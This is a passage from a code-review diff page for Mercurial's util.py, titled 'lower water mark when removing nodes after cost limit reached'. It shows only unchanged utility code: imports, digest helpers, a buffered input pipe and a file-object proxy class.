##// END OF EJS Templates
util: lower water mark when removing nodes after cost limit reached...
Gregory Szorc -
r39606:f296c0b3 default
parent child Browse files
Show More
@@ -1,3978 +1,3988 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import bz2
19 import bz2
20 import collections
20 import collections
21 import contextlib
21 import contextlib
22 import errno
22 import errno
23 import gc
23 import gc
24 import hashlib
24 import hashlib
25 import itertools
25 import itertools
26 import mmap
26 import mmap
27 import os
27 import os
28 import platform as pyplatform
28 import platform as pyplatform
29 import re as remod
29 import re as remod
30 import shutil
30 import shutil
31 import socket
31 import socket
32 import stat
32 import stat
33 import sys
33 import sys
34 import time
34 import time
35 import traceback
35 import traceback
36 import warnings
36 import warnings
37 import zlib
37 import zlib
38
38
39 from .thirdparty import (
39 from .thirdparty import (
40 attr,
40 attr,
41 )
41 )
42 from hgdemandimport import tracing
42 from hgdemandimport import tracing
43 from . import (
43 from . import (
44 encoding,
44 encoding,
45 error,
45 error,
46 i18n,
46 i18n,
47 node as nodemod,
47 node as nodemod,
48 policy,
48 policy,
49 pycompat,
49 pycompat,
50 urllibcompat,
50 urllibcompat,
51 )
51 )
52 from .utils import (
52 from .utils import (
53 procutil,
53 procutil,
54 stringutil,
54 stringutil,
55 )
55 )
56
56
57 base85 = policy.importmod(r'base85')
57 base85 = policy.importmod(r'base85')
58 osutil = policy.importmod(r'osutil')
58 osutil = policy.importmod(r'osutil')
59 parsers = policy.importmod(r'parsers')
59 parsers = policy.importmod(r'parsers')
60
60
61 b85decode = base85.b85decode
61 b85decode = base85.b85decode
62 b85encode = base85.b85encode
62 b85encode = base85.b85encode
63
63
64 cookielib = pycompat.cookielib
64 cookielib = pycompat.cookielib
65 httplib = pycompat.httplib
65 httplib = pycompat.httplib
66 pickle = pycompat.pickle
66 pickle = pycompat.pickle
67 safehasattr = pycompat.safehasattr
67 safehasattr = pycompat.safehasattr
68 socketserver = pycompat.socketserver
68 socketserver = pycompat.socketserver
69 bytesio = pycompat.bytesio
69 bytesio = pycompat.bytesio
70 # TODO deprecate stringio name, as it is a lie on Python 3.
70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 stringio = bytesio
71 stringio = bytesio
72 xmlrpclib = pycompat.xmlrpclib
72 xmlrpclib = pycompat.xmlrpclib
73
73
74 httpserver = urllibcompat.httpserver
74 httpserver = urllibcompat.httpserver
75 urlerr = urllibcompat.urlerr
75 urlerr = urllibcompat.urlerr
76 urlreq = urllibcompat.urlreq
76 urlreq = urllibcompat.urlreq
77
77
78 # workaround for win32mbcs
78 # workaround for win32mbcs
79 _filenamebytestr = pycompat.bytestr
79 _filenamebytestr = pycompat.bytestr
80
80
81 if pycompat.iswindows:
81 if pycompat.iswindows:
82 from . import windows as platform
82 from . import windows as platform
83 else:
83 else:
84 from . import posix as platform
84 from . import posix as platform
85
85
86 _ = i18n._
86 _ = i18n._
87
87
88 bindunixsocket = platform.bindunixsocket
88 bindunixsocket = platform.bindunixsocket
89 cachestat = platform.cachestat
89 cachestat = platform.cachestat
90 checkexec = platform.checkexec
90 checkexec = platform.checkexec
91 checklink = platform.checklink
91 checklink = platform.checklink
92 copymode = platform.copymode
92 copymode = platform.copymode
93 expandglobs = platform.expandglobs
93 expandglobs = platform.expandglobs
94 getfsmountpoint = platform.getfsmountpoint
94 getfsmountpoint = platform.getfsmountpoint
95 getfstype = platform.getfstype
95 getfstype = platform.getfstype
96 groupmembers = platform.groupmembers
96 groupmembers = platform.groupmembers
97 groupname = platform.groupname
97 groupname = platform.groupname
98 isexec = platform.isexec
98 isexec = platform.isexec
99 isowner = platform.isowner
99 isowner = platform.isowner
100 listdir = osutil.listdir
100 listdir = osutil.listdir
101 localpath = platform.localpath
101 localpath = platform.localpath
102 lookupreg = platform.lookupreg
102 lookupreg = platform.lookupreg
103 makedir = platform.makedir
103 makedir = platform.makedir
104 nlinks = platform.nlinks
104 nlinks = platform.nlinks
105 normpath = platform.normpath
105 normpath = platform.normpath
106 normcase = platform.normcase
106 normcase = platform.normcase
107 normcasespec = platform.normcasespec
107 normcasespec = platform.normcasespec
108 normcasefallback = platform.normcasefallback
108 normcasefallback = platform.normcasefallback
109 openhardlinks = platform.openhardlinks
109 openhardlinks = platform.openhardlinks
110 oslink = platform.oslink
110 oslink = platform.oslink
111 parsepatchoutput = platform.parsepatchoutput
111 parsepatchoutput = platform.parsepatchoutput
112 pconvert = platform.pconvert
112 pconvert = platform.pconvert
113 poll = platform.poll
113 poll = platform.poll
114 posixfile = platform.posixfile
114 posixfile = platform.posixfile
115 rename = platform.rename
115 rename = platform.rename
116 removedirs = platform.removedirs
116 removedirs = platform.removedirs
117 samedevice = platform.samedevice
117 samedevice = platform.samedevice
118 samefile = platform.samefile
118 samefile = platform.samefile
119 samestat = platform.samestat
119 samestat = platform.samestat
120 setflags = platform.setflags
120 setflags = platform.setflags
121 split = platform.split
121 split = platform.split
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 statisexec = platform.statisexec
123 statisexec = platform.statisexec
124 statislink = platform.statislink
124 statislink = platform.statislink
125 umask = platform.umask
125 umask = platform.umask
126 unlink = platform.unlink
126 unlink = platform.unlink
127 username = platform.username
127 username = platform.username
128
128
129 try:
129 try:
130 recvfds = osutil.recvfds
130 recvfds = osutil.recvfds
131 except AttributeError:
131 except AttributeError:
132 pass
132 pass
133
133
134 # Python compatibility
134 # Python compatibility
135
135
136 _notset = object()
136 _notset = object()
137
137
138 def bitsfrom(container):
138 def bitsfrom(container):
139 bits = 0
139 bits = 0
140 for bit in container:
140 for bit in container:
141 bits |= bit
141 bits |= bit
142 return bits
142 return bits
143
143
144 # python 2.6 still have deprecation warning enabled by default. We do not want
144 # python 2.6 still have deprecation warning enabled by default. We do not want
145 # to display anything to standard user so detect if we are running test and
145 # to display anything to standard user so detect if we are running test and
146 # only use python deprecation warning in this case.
146 # only use python deprecation warning in this case.
147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
147 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
148 if _dowarn:
148 if _dowarn:
149 # explicitly unfilter our warning for python 2.7
149 # explicitly unfilter our warning for python 2.7
150 #
150 #
151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
151 # The option of setting PYTHONWARNINGS in the test runner was investigated.
152 # However, module name set through PYTHONWARNINGS was exactly matched, so
152 # However, module name set through PYTHONWARNINGS was exactly matched, so
153 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
153 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
154 # makes the whole PYTHONWARNINGS thing useless for our usecase.
154 # makes the whole PYTHONWARNINGS thing useless for our usecase.
155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
155 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
158 if _dowarn and pycompat.ispy3:
158 if _dowarn and pycompat.ispy3:
159 # silence warning emitted by passing user string to re.sub()
159 # silence warning emitted by passing user string to re.sub()
160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
160 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
161 r'mercurial')
161 r'mercurial')
162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
162 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
163 DeprecationWarning, r'mercurial')
163 DeprecationWarning, r'mercurial')
164 # TODO: reinvent imp.is_frozen()
164 # TODO: reinvent imp.is_frozen()
165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
165 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
166 DeprecationWarning, r'mercurial')
166 DeprecationWarning, r'mercurial')
167
167
168 def nouideprecwarn(msg, version, stacklevel=1):
168 def nouideprecwarn(msg, version, stacklevel=1):
169 """Issue an python native deprecation warning
169 """Issue an python native deprecation warning
170
170
171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
171 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
172 """
172 """
173 if _dowarn:
173 if _dowarn:
174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
174 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
175 " update your code.)") % version
175 " update your code.)") % version
176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
176 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
177
177
178 DIGESTS = {
178 DIGESTS = {
179 'md5': hashlib.md5,
179 'md5': hashlib.md5,
180 'sha1': hashlib.sha1,
180 'sha1': hashlib.sha1,
181 'sha512': hashlib.sha512,
181 'sha512': hashlib.sha512,
182 }
182 }
183 # List of digest types from strongest to weakest
183 # List of digest types from strongest to weakest
184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
184 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
185
185
186 for k in DIGESTS_BY_STRENGTH:
186 for k in DIGESTS_BY_STRENGTH:
187 assert k in DIGESTS
187 assert k in DIGESTS
188
188
189 class digester(object):
189 class digester(object):
190 """helper to compute digests.
190 """helper to compute digests.
191
191
192 This helper can be used to compute one or more digests given their name.
192 This helper can be used to compute one or more digests given their name.
193
193
194 >>> d = digester([b'md5', b'sha1'])
194 >>> d = digester([b'md5', b'sha1'])
195 >>> d.update(b'foo')
195 >>> d.update(b'foo')
196 >>> [k for k in sorted(d)]
196 >>> [k for k in sorted(d)]
197 ['md5', 'sha1']
197 ['md5', 'sha1']
198 >>> d[b'md5']
198 >>> d[b'md5']
199 'acbd18db4cc2f85cedef654fccc4a4d8'
199 'acbd18db4cc2f85cedef654fccc4a4d8'
200 >>> d[b'sha1']
200 >>> d[b'sha1']
201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
201 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
202 >>> digester.preferred([b'md5', b'sha1'])
202 >>> digester.preferred([b'md5', b'sha1'])
203 'sha1'
203 'sha1'
204 """
204 """
205
205
206 def __init__(self, digests, s=''):
206 def __init__(self, digests, s=''):
207 self._hashes = {}
207 self._hashes = {}
208 for k in digests:
208 for k in digests:
209 if k not in DIGESTS:
209 if k not in DIGESTS:
210 raise error.Abort(_('unknown digest type: %s') % k)
210 raise error.Abort(_('unknown digest type: %s') % k)
211 self._hashes[k] = DIGESTS[k]()
211 self._hashes[k] = DIGESTS[k]()
212 if s:
212 if s:
213 self.update(s)
213 self.update(s)
214
214
215 def update(self, data):
215 def update(self, data):
216 for h in self._hashes.values():
216 for h in self._hashes.values():
217 h.update(data)
217 h.update(data)
218
218
219 def __getitem__(self, key):
219 def __getitem__(self, key):
220 if key not in DIGESTS:
220 if key not in DIGESTS:
221 raise error.Abort(_('unknown digest type: %s') % k)
221 raise error.Abort(_('unknown digest type: %s') % k)
222 return nodemod.hex(self._hashes[key].digest())
222 return nodemod.hex(self._hashes[key].digest())
223
223
224 def __iter__(self):
224 def __iter__(self):
225 return iter(self._hashes)
225 return iter(self._hashes)
226
226
227 @staticmethod
227 @staticmethod
228 def preferred(supported):
228 def preferred(supported):
229 """returns the strongest digest type in both supported and DIGESTS."""
229 """returns the strongest digest type in both supported and DIGESTS."""
230
230
231 for k in DIGESTS_BY_STRENGTH:
231 for k in DIGESTS_BY_STRENGTH:
232 if k in supported:
232 if k in supported:
233 return k
233 return k
234 return None
234 return None
235
235
236 class digestchecker(object):
236 class digestchecker(object):
237 """file handle wrapper that additionally checks content against a given
237 """file handle wrapper that additionally checks content against a given
238 size and digests.
238 size and digests.
239
239
240 d = digestchecker(fh, size, {'md5': '...'})
240 d = digestchecker(fh, size, {'md5': '...'})
241
241
242 When multiple digests are given, all of them are validated.
242 When multiple digests are given, all of them are validated.
243 """
243 """
244
244
245 def __init__(self, fh, size, digests):
245 def __init__(self, fh, size, digests):
246 self._fh = fh
246 self._fh = fh
247 self._size = size
247 self._size = size
248 self._got = 0
248 self._got = 0
249 self._digests = dict(digests)
249 self._digests = dict(digests)
250 self._digester = digester(self._digests.keys())
250 self._digester = digester(self._digests.keys())
251
251
252 def read(self, length=-1):
252 def read(self, length=-1):
253 content = self._fh.read(length)
253 content = self._fh.read(length)
254 self._digester.update(content)
254 self._digester.update(content)
255 self._got += len(content)
255 self._got += len(content)
256 return content
256 return content
257
257
258 def validate(self):
258 def validate(self):
259 if self._size != self._got:
259 if self._size != self._got:
260 raise error.Abort(_('size mismatch: expected %d, got %d') %
260 raise error.Abort(_('size mismatch: expected %d, got %d') %
261 (self._size, self._got))
261 (self._size, self._got))
262 for k, v in self._digests.items():
262 for k, v in self._digests.items():
263 if v != self._digester[k]:
263 if v != self._digester[k]:
264 # i18n: first parameter is a digest name
264 # i18n: first parameter is a digest name
265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
265 raise error.Abort(_('%s mismatch: expected %s, got %s') %
266 (k, v, self._digester[k]))
266 (k, v, self._digester[k]))
267
267
268 try:
268 try:
269 buffer = buffer
269 buffer = buffer
270 except NameError:
270 except NameError:
271 def buffer(sliceable, offset=0, length=None):
271 def buffer(sliceable, offset=0, length=None):
272 if length is not None:
272 if length is not None:
273 return memoryview(sliceable)[offset:offset + length]
273 return memoryview(sliceable)[offset:offset + length]
274 return memoryview(sliceable)[offset:]
274 return memoryview(sliceable)[offset:]
275
275
276 _chunksize = 4096
276 _chunksize = 4096
277
277
278 class bufferedinputpipe(object):
278 class bufferedinputpipe(object):
279 """a manually buffered input pipe
279 """a manually buffered input pipe
280
280
281 Python will not let us use buffered IO and lazy reading with 'polling' at
281 Python will not let us use buffered IO and lazy reading with 'polling' at
282 the same time. We cannot probe the buffer state and select will not detect
282 the same time. We cannot probe the buffer state and select will not detect
283 that data are ready to read if they are already buffered.
283 that data are ready to read if they are already buffered.
284
284
285 This class let us work around that by implementing its own buffering
285 This class let us work around that by implementing its own buffering
286 (allowing efficient readline) while offering a way to know if the buffer is
286 (allowing efficient readline) while offering a way to know if the buffer is
287 empty from the output (allowing collaboration of the buffer with polling).
287 empty from the output (allowing collaboration of the buffer with polling).
288
288
289 This class lives in the 'util' module because it makes use of the 'os'
289 This class lives in the 'util' module because it makes use of the 'os'
290 module from the python stdlib.
290 module from the python stdlib.
291 """
291 """
292 def __new__(cls, fh):
292 def __new__(cls, fh):
293 # If we receive a fileobjectproxy, we need to use a variation of this
293 # If we receive a fileobjectproxy, we need to use a variation of this
294 # class that notifies observers about activity.
294 # class that notifies observers about activity.
295 if isinstance(fh, fileobjectproxy):
295 if isinstance(fh, fileobjectproxy):
296 cls = observedbufferedinputpipe
296 cls = observedbufferedinputpipe
297
297
298 return super(bufferedinputpipe, cls).__new__(cls)
298 return super(bufferedinputpipe, cls).__new__(cls)
299
299
300 def __init__(self, input):
300 def __init__(self, input):
301 self._input = input
301 self._input = input
302 self._buffer = []
302 self._buffer = []
303 self._eof = False
303 self._eof = False
304 self._lenbuf = 0
304 self._lenbuf = 0
305
305
306 @property
306 @property
307 def hasbuffer(self):
307 def hasbuffer(self):
308 """True is any data is currently buffered
308 """True is any data is currently buffered
309
309
310 This will be used externally a pre-step for polling IO. If there is
310 This will be used externally a pre-step for polling IO. If there is
311 already data then no polling should be set in place."""
311 already data then no polling should be set in place."""
312 return bool(self._buffer)
312 return bool(self._buffer)
313
313
314 @property
314 @property
315 def closed(self):
315 def closed(self):
316 return self._input.closed
316 return self._input.closed
317
317
318 def fileno(self):
318 def fileno(self):
319 return self._input.fileno()
319 return self._input.fileno()
320
320
321 def close(self):
321 def close(self):
322 return self._input.close()
322 return self._input.close()
323
323
324 def read(self, size):
324 def read(self, size):
325 while (not self._eof) and (self._lenbuf < size):
325 while (not self._eof) and (self._lenbuf < size):
326 self._fillbuffer()
326 self._fillbuffer()
327 return self._frombuffer(size)
327 return self._frombuffer(size)
328
328
329 def unbufferedread(self, size):
329 def unbufferedread(self, size):
330 if not self._eof and self._lenbuf == 0:
330 if not self._eof and self._lenbuf == 0:
331 self._fillbuffer(max(size, _chunksize))
331 self._fillbuffer(max(size, _chunksize))
332 return self._frombuffer(min(self._lenbuf, size))
332 return self._frombuffer(min(self._lenbuf, size))
333
333
334 def readline(self, *args, **kwargs):
334 def readline(self, *args, **kwargs):
335 if 1 < len(self._buffer):
335 if 1 < len(self._buffer):
336 # this should not happen because both read and readline end with a
336 # this should not happen because both read and readline end with a
337 # _frombuffer call that collapse it.
337 # _frombuffer call that collapse it.
338 self._buffer = [''.join(self._buffer)]
338 self._buffer = [''.join(self._buffer)]
339 self._lenbuf = len(self._buffer[0])
339 self._lenbuf = len(self._buffer[0])
340 lfi = -1
340 lfi = -1
341 if self._buffer:
341 if self._buffer:
342 lfi = self._buffer[-1].find('\n')
342 lfi = self._buffer[-1].find('\n')
343 while (not self._eof) and lfi < 0:
343 while (not self._eof) and lfi < 0:
344 self._fillbuffer()
344 self._fillbuffer()
345 if self._buffer:
345 if self._buffer:
346 lfi = self._buffer[-1].find('\n')
346 lfi = self._buffer[-1].find('\n')
347 size = lfi + 1
347 size = lfi + 1
348 if lfi < 0: # end of file
348 if lfi < 0: # end of file
349 size = self._lenbuf
349 size = self._lenbuf
350 elif 1 < len(self._buffer):
350 elif 1 < len(self._buffer):
351 # we need to take previous chunks into account
351 # we need to take previous chunks into account
352 size += self._lenbuf - len(self._buffer[-1])
352 size += self._lenbuf - len(self._buffer[-1])
353 return self._frombuffer(size)
353 return self._frombuffer(size)
354
354
355 def _frombuffer(self, size):
355 def _frombuffer(self, size):
356 """return at most 'size' data from the buffer
356 """return at most 'size' data from the buffer
357
357
358 The data are removed from the buffer."""
358 The data are removed from the buffer."""
359 if size == 0 or not self._buffer:
359 if size == 0 or not self._buffer:
360 return ''
360 return ''
361 buf = self._buffer[0]
361 buf = self._buffer[0]
362 if 1 < len(self._buffer):
362 if 1 < len(self._buffer):
363 buf = ''.join(self._buffer)
363 buf = ''.join(self._buffer)
364
364
365 data = buf[:size]
365 data = buf[:size]
366 buf = buf[len(data):]
366 buf = buf[len(data):]
367 if buf:
367 if buf:
368 self._buffer = [buf]
368 self._buffer = [buf]
369 self._lenbuf = len(buf)
369 self._lenbuf = len(buf)
370 else:
370 else:
371 self._buffer = []
371 self._buffer = []
372 self._lenbuf = 0
372 self._lenbuf = 0
373 return data
373 return data
374
374
375 def _fillbuffer(self, size=_chunksize):
375 def _fillbuffer(self, size=_chunksize):
376 """read data to the buffer"""
376 """read data to the buffer"""
377 data = os.read(self._input.fileno(), size)
377 data = os.read(self._input.fileno(), size)
378 if not data:
378 if not data:
379 self._eof = True
379 self._eof = True
380 else:
380 else:
381 self._lenbuf += len(data)
381 self._lenbuf += len(data)
382 self._buffer.append(data)
382 self._buffer.append(data)
383
383
384 return data
384 return data
385
385
386 def mmapread(fp):
386 def mmapread(fp):
387 try:
387 try:
388 fd = getattr(fp, 'fileno', lambda: fp)()
388 fd = getattr(fp, 'fileno', lambda: fp)()
389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
389 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
390 except ValueError:
390 except ValueError:
391 # Empty files cannot be mmapped, but mmapread should still work. Check
391 # Empty files cannot be mmapped, but mmapread should still work. Check
392 # if the file is empty, and if so, return an empty buffer.
392 # if the file is empty, and if so, return an empty buffer.
393 if os.fstat(fd).st_size == 0:
393 if os.fstat(fd).st_size == 0:
394 return ''
394 return ''
395 raise
395 raise
396
396
397 class fileobjectproxy(object):
397 class fileobjectproxy(object):
398 """A proxy around file objects that tells a watcher when events occur.
398 """A proxy around file objects that tells a watcher when events occur.
399
399
400 This type is intended to only be used for testing purposes. Think hard
400 This type is intended to only be used for testing purposes. Think hard
401 before using it in important code.
401 before using it in important code.
402 """
402 """
403 __slots__ = (
403 __slots__ = (
404 r'_orig',
404 r'_orig',
405 r'_observer',
405 r'_observer',
406 )
406 )
407
407
408 def __init__(self, fh, observer):
408 def __init__(self, fh, observer):
409 object.__setattr__(self, r'_orig', fh)
409 object.__setattr__(self, r'_orig', fh)
410 object.__setattr__(self, r'_observer', observer)
410 object.__setattr__(self, r'_observer', observer)
411
411
412 def __getattribute__(self, name):
412 def __getattribute__(self, name):
413 ours = {
413 ours = {
414 r'_observer',
414 r'_observer',
415
415
416 # IOBase
416 # IOBase
417 r'close',
417 r'close',
418 # closed if a property
418 # closed if a property
419 r'fileno',
419 r'fileno',
420 r'flush',
420 r'flush',
421 r'isatty',
421 r'isatty',
422 r'readable',
422 r'readable',
423 r'readline',
423 r'readline',
424 r'readlines',
424 r'readlines',
425 r'seek',
425 r'seek',
426 r'seekable',
426 r'seekable',
427 r'tell',
427 r'tell',
428 r'truncate',
428 r'truncate',
429 r'writable',
429 r'writable',
430 r'writelines',
430 r'writelines',
431 # RawIOBase
431 # RawIOBase
432 r'read',
432 r'read',
433 r'readall',
433 r'readall',
434 r'readinto',
434 r'readinto',
435 r'write',
435 r'write',
436 # BufferedIOBase
436 # BufferedIOBase
437 # raw is a property
437 # raw is a property
438 r'detach',
438 r'detach',
439 # read defined above
439 # read defined above
440 r'read1',
440 r'read1',
441 # readinto defined above
441 # readinto defined above
442 # write defined above
442 # write defined above
443 }
443 }
444
444
445 # We only observe some methods.
445 # We only observe some methods.
446 if name in ours:
446 if name in ours:
447 return object.__getattribute__(self, name)
447 return object.__getattribute__(self, name)
448
448
449 return getattr(object.__getattribute__(self, r'_orig'), name)
449 return getattr(object.__getattribute__(self, r'_orig'), name)
450
450
451 def __nonzero__(self):
451 def __nonzero__(self):
452 return bool(object.__getattribute__(self, r'_orig'))
452 return bool(object.__getattribute__(self, r'_orig'))
453
453
454 __bool__ = __nonzero__
454 __bool__ = __nonzero__
455
455
456 def __delattr__(self, name):
456 def __delattr__(self, name):
457 return delattr(object.__getattribute__(self, r'_orig'), name)
457 return delattr(object.__getattribute__(self, r'_orig'), name)
458
458
459 def __setattr__(self, name, value):
459 def __setattr__(self, name, value):
460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
460 return setattr(object.__getattribute__(self, r'_orig'), name, value)
461
461
462 def __iter__(self):
462 def __iter__(self):
463 return object.__getattribute__(self, r'_orig').__iter__()
463 return object.__getattribute__(self, r'_orig').__iter__()
464
464
465 def _observedcall(self, name, *args, **kwargs):
465 def _observedcall(self, name, *args, **kwargs):
466 # Call the original object.
466 # Call the original object.
467 orig = object.__getattribute__(self, r'_orig')
467 orig = object.__getattribute__(self, r'_orig')
468 res = getattr(orig, name)(*args, **kwargs)
468 res = getattr(orig, name)(*args, **kwargs)
469
469
470 # Call a method on the observer of the same name with arguments
470 # Call a method on the observer of the same name with arguments
471 # so it can react, log, etc.
471 # so it can react, log, etc.
472 observer = object.__getattribute__(self, r'_observer')
472 observer = object.__getattribute__(self, r'_observer')
473 fn = getattr(observer, name, None)
473 fn = getattr(observer, name, None)
474 if fn:
474 if fn:
475 fn(res, *args, **kwargs)
475 fn(res, *args, **kwargs)
476
476
477 return res
477 return res
478
478
479 def close(self, *args, **kwargs):
479 def close(self, *args, **kwargs):
480 return object.__getattribute__(self, r'_observedcall')(
480 return object.__getattribute__(self, r'_observedcall')(
481 r'close', *args, **kwargs)
481 r'close', *args, **kwargs)
482
482
483 def fileno(self, *args, **kwargs):
483 def fileno(self, *args, **kwargs):
484 return object.__getattribute__(self, r'_observedcall')(
484 return object.__getattribute__(self, r'_observedcall')(
485 r'fileno', *args, **kwargs)
485 r'fileno', *args, **kwargs)
486
486
487 def flush(self, *args, **kwargs):
487 def flush(self, *args, **kwargs):
488 return object.__getattribute__(self, r'_observedcall')(
488 return object.__getattribute__(self, r'_observedcall')(
489 r'flush', *args, **kwargs)
489 r'flush', *args, **kwargs)
490
490
491 def isatty(self, *args, **kwargs):
491 def isatty(self, *args, **kwargs):
492 return object.__getattribute__(self, r'_observedcall')(
492 return object.__getattribute__(self, r'_observedcall')(
493 r'isatty', *args, **kwargs)
493 r'isatty', *args, **kwargs)
494
494
495 def readable(self, *args, **kwargs):
495 def readable(self, *args, **kwargs):
496 return object.__getattribute__(self, r'_observedcall')(
496 return object.__getattribute__(self, r'_observedcall')(
497 r'readable', *args, **kwargs)
497 r'readable', *args, **kwargs)
498
498
499 def readline(self, *args, **kwargs):
499 def readline(self, *args, **kwargs):
500 return object.__getattribute__(self, r'_observedcall')(
500 return object.__getattribute__(self, r'_observedcall')(
501 r'readline', *args, **kwargs)
501 r'readline', *args, **kwargs)
502
502
503 def readlines(self, *args, **kwargs):
503 def readlines(self, *args, **kwargs):
504 return object.__getattribute__(self, r'_observedcall')(
504 return object.__getattribute__(self, r'_observedcall')(
505 r'readlines', *args, **kwargs)
505 r'readlines', *args, **kwargs)
506
506
507 def seek(self, *args, **kwargs):
507 def seek(self, *args, **kwargs):
508 return object.__getattribute__(self, r'_observedcall')(
508 return object.__getattribute__(self, r'_observedcall')(
509 r'seek', *args, **kwargs)
509 r'seek', *args, **kwargs)
510
510
511 def seekable(self, *args, **kwargs):
511 def seekable(self, *args, **kwargs):
512 return object.__getattribute__(self, r'_observedcall')(
512 return object.__getattribute__(self, r'_observedcall')(
513 r'seekable', *args, **kwargs)
513 r'seekable', *args, **kwargs)
514
514
515 def tell(self, *args, **kwargs):
515 def tell(self, *args, **kwargs):
516 return object.__getattribute__(self, r'_observedcall')(
516 return object.__getattribute__(self, r'_observedcall')(
517 r'tell', *args, **kwargs)
517 r'tell', *args, **kwargs)
518
518
519 def truncate(self, *args, **kwargs):
519 def truncate(self, *args, **kwargs):
520 return object.__getattribute__(self, r'_observedcall')(
520 return object.__getattribute__(self, r'_observedcall')(
521 r'truncate', *args, **kwargs)
521 r'truncate', *args, **kwargs)
522
522
523 def writable(self, *args, **kwargs):
523 def writable(self, *args, **kwargs):
524 return object.__getattribute__(self, r'_observedcall')(
524 return object.__getattribute__(self, r'_observedcall')(
525 r'writable', *args, **kwargs)
525 r'writable', *args, **kwargs)
526
526
527 def writelines(self, *args, **kwargs):
527 def writelines(self, *args, **kwargs):
528 return object.__getattribute__(self, r'_observedcall')(
528 return object.__getattribute__(self, r'_observedcall')(
529 r'writelines', *args, **kwargs)
529 r'writelines', *args, **kwargs)
530
530
531 def read(self, *args, **kwargs):
531 def read(self, *args, **kwargs):
532 return object.__getattribute__(self, r'_observedcall')(
532 return object.__getattribute__(self, r'_observedcall')(
533 r'read', *args, **kwargs)
533 r'read', *args, **kwargs)
534
534
535 def readall(self, *args, **kwargs):
535 def readall(self, *args, **kwargs):
536 return object.__getattribute__(self, r'_observedcall')(
536 return object.__getattribute__(self, r'_observedcall')(
537 r'readall', *args, **kwargs)
537 r'readall', *args, **kwargs)
538
538
539 def readinto(self, *args, **kwargs):
539 def readinto(self, *args, **kwargs):
540 return object.__getattribute__(self, r'_observedcall')(
540 return object.__getattribute__(self, r'_observedcall')(
541 r'readinto', *args, **kwargs)
541 r'readinto', *args, **kwargs)
542
542
543 def write(self, *args, **kwargs):
543 def write(self, *args, **kwargs):
544 return object.__getattribute__(self, r'_observedcall')(
544 return object.__getattribute__(self, r'_observedcall')(
545 r'write', *args, **kwargs)
545 r'write', *args, **kwargs)
546
546
547 def detach(self, *args, **kwargs):
547 def detach(self, *args, **kwargs):
548 return object.__getattribute__(self, r'_observedcall')(
548 return object.__getattribute__(self, r'_observedcall')(
549 r'detach', *args, **kwargs)
549 r'detach', *args, **kwargs)
550
550
551 def read1(self, *args, **kwargs):
551 def read1(self, *args, **kwargs):
552 return object.__getattribute__(self, r'_observedcall')(
552 return object.__getattribute__(self, r'_observedcall')(
553 r'read1', *args, **kwargs)
553 r'read1', *args, **kwargs)
554
554
555 class observedbufferedinputpipe(bufferedinputpipe):
555 class observedbufferedinputpipe(bufferedinputpipe):
556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
556 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
557
557
558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
558 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
559 bypass ``fileobjectproxy``. Because of this, we need to make
559 bypass ``fileobjectproxy``. Because of this, we need to make
560 ``bufferedinputpipe`` aware of these operations.
560 ``bufferedinputpipe`` aware of these operations.
561
561
562 This variation of ``bufferedinputpipe`` can notify observers about
562 This variation of ``bufferedinputpipe`` can notify observers about
563 ``os.read()`` events. It also re-publishes other events, such as
563 ``os.read()`` events. It also re-publishes other events, such as
564 ``read()`` and ``readline()``.
564 ``read()`` and ``readline()``.
565 """
